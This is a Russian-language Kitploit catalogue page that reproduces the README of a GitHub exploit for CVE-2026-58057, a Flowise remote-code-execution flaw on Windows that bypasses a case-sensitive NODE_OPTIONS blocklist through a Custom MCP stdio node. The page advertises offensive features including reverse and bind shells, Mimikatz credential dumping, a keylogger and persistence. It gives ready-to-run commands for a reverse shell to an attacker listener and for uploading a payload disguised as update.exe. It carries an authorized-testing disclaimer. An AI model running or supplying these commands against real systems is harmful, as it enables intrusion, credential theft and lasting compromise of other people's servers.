Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Flowise-CVE-2026-58057-exploit — Flowise Windows RCE-эксплойт для CVE-2026-58057. Обходит проверку переменных окружения через уязвимость, чувствительную к регистру. Использует node_options для внедрения произвольного кода через MCP stdio. Поддерживает reverse shell, закрепление в системе, загрузку файлов, дамп учётных данных. Только для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/flowise-cve-2026-58057-exploit
Механизмы персистентностиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииПост-эксплуатацияТестирование на ПроникновениеКомандование и Управление
Red Teaming
Разработка Полезной Нагрузки
GitHubcerberusmrxi/flowise-cve-2026-58057-exploit

Flowise-CVE-2026-58057-exploit

Репозиторий
1222 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Flowise Windows RCE-эксплойт для CVE-2026-58057. Обходит проверку переменных окружения через уязвимость, чувствительную к регистру. Использует node_options для внедрения произвольного кода через MCP stdio. Поддерживает reverse shell, закрепление в системе, загрузку файлов, дамп учётных данных. Только для авторизованного тестирования безопасности.

Поделиться

Flowise CVE-2026-58057 - Эксплойт удаленного выполнения кода на Windows

Project Badge CVE Badge Author Badge Version Badge CVSS Score Badge Affected Versions Badge Fixed Version Badge

📋 Обзор

Это эксплойт производственного уровня для CVE-2026-58057 — критической уязвимости удаленного выполнения кода (RCE) в Flowise на платформе Windows. Уязвимость возникает из-за проверки переменных окружения с учетом регистра, которая не блокирует нижний регистр node_options, что позволяет злоумышленникам обойти черный список NODE_OPTIONS и выполнить произвольный код через конфигурацию Custom MCP stdio.

Эксплойт демонстрирует профессиональные инженерные практики: модульную архитектуру, всестороннюю обработку ошибок и поддержку нескольких типов полезных нагрузок.

f1

f2

⚠️ Отказ от ответственности

ВАЖНО: Этот инструмент предоставляется только для авторизованного тестирования безопасности, пентеста и образовательных целей. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный данным программным обеспечением. Всегда получайте надлежащее разрешение перед тестированием любой системы.

🔍 Технические детали

Первопричина уязвимости

# Уязвимая проверка (с учетом регистра)
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key in dangerous:  # Блокируется только точное совпадение в верхнем регистре
    raise ValueError(f"Modification not allowed")

Механизм эксплуатации

  1. Злоумышленник аутентифицируется в Flowise

  2. Создаёт/изменяет узел Custom MCP stdio

  3. Внедряет переменную окружения node_options в нижнем регистре

  4. Устанавливает значение --require malicious-loader.js

  5. Node.js выполняет загрузчик при запуске MCP stdio

  6. Достигается произвольное выполнение кода

✨ Возможности

Основные возможности

  • ✅ Reverse Shell — обратное подключение к машине атакующего

  • ✅ Bind Shell — открытие порта прослушивания на цели

  • ✅ Выполнение команд — запуск произвольных системных команд

  • ✅ Загрузка файлов — загрузка файлов в целевую систему

  • ✅ Сохранение доступа — несколько механизмов персистентности

  • ✅ Сбор информации — сбор данных о системе

  • ✅ Извлечение учётных данных — интеграция с Mimikatz

  • ✅ Захват скриншотов — снятие скриншотов рабочего стола

  • ✅ Кейлоггер — установка возможности записи нажатий клавиш

Технические особенности

  • 🔐 Несколько методов аутентификации — API-ключ или имя пользователя/пароль

  • 🔄 Автоматическая логика повтора — устойчивость к сетевым проблемам

  • 🧹 Самоочистка — удаление файлов загрузчика с цели

  • 🌐 Кроссплатформенность — работает на Windows/Linux/macOS

  • 🎨 Цветной вывод — улучшенная читаемость

  • 📊 Подробная отладка — детальное логирование для устранения неполадок

📦 Установка

Предварительные требования

  • Python 3.6 или выше

  • pip (менеджер пакетов Python)

Быстрая установка

# Клонируйте репозиторий
git clone https://github.com/CerberusMrXi/Flowise-CVE-2026-58057-exploit
cd Flowise-CVE-2026-58057-exploit

# Установите зависимости
pip install -r requirements.txt

# Или минимальная установка
pip install requests urllib3

Установка через Docker (опционально)

FROM python:3.9-alpine
RUN apk add --no-cache gcc musl-dev
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY exploit.py .
ENTRYPOINT ["python3", "exploit.py"]

🚀 Использование

Параметры командной строки

python3 exploit.py --help

Параметры аутентификации

ПараметрОписаниеПример
-t, --targetURL Flowise (обязательно)http://localhost:3000
-k, --api-keyAPI-ключ Flowiseflowise_abc123...
-u, --usernameИмя пользователяadmin
-p, --passwordПарольpassword123

Параметры полезной нагрузки

ПараметрОписаниеПример
--payloadТип полезной нагрузкиreverse_shell
--lhostХост слушателя192.168.1.100
--lportПорт слушателя4444
--commandКоманда для выполненияwhoami
--local-fileФайл для загрузкиpayload.exe
--remote-pathУдаленный путь сохраненияC:\\Temp\\update.exe

Параметры выполнения

ПараметрОписание
--interactiveЗапуск интерактивной оболочки
--verboseВключить отладочный вывод
--timeoutТайм-аут запроса в секундах
--retriesКоличество попыток повтора

📝 Примеры использования

1. Базовый Reverse Shell

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444

2. Интерактивный Reverse Shell

python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444 \
    --interactive

3. Выполнение команды

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload command_exec \
    --command "whoami"

4. Загрузка файла

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload file_upload \
    --local-file /path/to/payload.exe \
    --remote-path "C:\\ProgramData\\update.exe"

5. Извлечение учётных данных (Mimikatz)

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload mimikatz

6. Установка персистентности

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload persistence

7. Сбор информации

Скачать инструмент